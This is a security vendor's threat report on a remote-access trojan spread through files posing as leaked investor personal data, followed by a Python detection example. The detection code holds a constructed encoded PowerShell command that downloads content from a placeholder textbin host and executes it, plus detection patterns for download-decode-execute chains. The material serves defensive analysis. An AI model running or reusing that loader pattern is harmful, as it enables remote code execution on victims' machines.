AhnLab Security Emergency response Center (ASEC) discovered a case of malware being distributed with the sale of personal information as bait. The attack relies on a social engineering technique. This post presents the recently discovered circumstances of the distribution.
Figure 1 shows the content of the website the threat actor used as a distribution site, which hosts multiple files. Most of the files contain personal information, and their names include investment-related keywords such as ‘reading,’ ‘unlisted,’ ‘day trading,’ and ‘mid to long term.’
On the malware distribution site, the threat actor kept files holding a large volume of personal information, over 8,500 entries in total. Aside from names and phone numbers, some files also contained personal investment amounts and credit ratings.
The malware distributor was confirmed to be using this personal data, disguised as being for sale, to propagate malware (see Figure 5). Both the script in Figure 6, which performs the actual infection, and the personal data file are downloaded and executed. Because nothing is shown when the script executes and the personal information file is opened as expected, it is difficult for the user to notice the infection.
Figure 6 shows the content of win64.vbs, which appears in the Figure 1 list. The script substitutes characters in an encoded string, decodes it, and runs the result through PowerShell. The executed command is fairly simple: it reads the string hosted at the textbin address, base64-decodes it, and executes the result. Ultimately, the command downloads and runs base64.txt, which also appears in the list in Figure 1.
The executed malware has the same features as RAT-type malware that allows remote control: autorun registration, executing scripts, downloading additional files, executing the downloaded files through Regsvcs.exe (a legitimate process), and establishing a reverse connection.
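The staging chain above (script host launching PowerShell, which base64-decodes remote content and executes it, followed by Regsvcs.exe loading a downloaded file) is the kind of behaviour a process-creation detection can flag. The following is an added example written for this post, not ASEC's or the threat actor's code; the event tuples, the textbin.example URL and the file paths are constructed fixtures, and the detection tags are hypothetical names.

```python
import base64
import re

# Constructed UTF-16LE base64 payload mimicking the post's download/decode/execute pattern.
_PS_BODY = ("IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
            "(New-Object Net.WebClient).DownloadString('https://textbin.example/raw/x'))))")
ENCODED_LAUNCH = "powershell.exe -w hidden -enc " + base64.b64encode(_PS_BODY.encode("utf-16-le")).decode()

# Constructed process-creation events: (parent image, child image, child command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\win64.vbs"'),
    ("wscript.exe", "powershell.exe", ENCODED_LAUNCH),
    ("powershell.exe", "Regsvcs.exe", r"Regsvcs.exe C:\Users\u\AppData\Local\Temp\payload.dll"),
    ("svchost.exe", "powershell.exe", "powershell.exe -Command Get-Date"),  # benign control
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_PS = re.compile(r"FromBase64String|Invoke-Expression|\bIEX\b|DownloadString|DownloadFile", re.I)
USER_WRITABLE = re.compile(r"\\Users\\|\\Temp\\|\\AppData\\", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None if absent/invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(parent, image, cmdline):
    """Return detection tags for one process-creation event (empty list if nothing matched)."""
    tags = []
    if image.lower() == "powershell.exe":
        decoded = decode_encoded_command(cmdline)
        if parent.lower() in SCRIPT_HOSTS:
            tags.append("powershell_from_script_host")
        if decoded is not None:
            tags.append("encoded_command")
        if SUSPICIOUS_PS.search(decoded or cmdline):  # inspect the decoded text, not the base64 blob
            tags.append("download_decode_execute")
    if image.lower() == "regsvcs.exe" and USER_WRITABLE.search(cmdline):
        tags.append("regsvcs_user_writable_payload")
    return tags


def scan(events):
    """Return (image, tags) for every event that raised at least one tag."""
    hits = [(image, classify_event(parent, image, cmd)) for parent, image, cmd in events]
    return [(image, tags) for image, tags in hits if tags]
```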
This post examined a case of malware distribution using personal information as bait. The files covered contained keywords such as ‘reading,’ ‘unlisted,’ and ‘day trading.’ Such indiscriminately collected personal data is stored unencrypted and can be reused for malware distribution once leaked. Users must be cautious of unauthorized group chats offering investment information.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.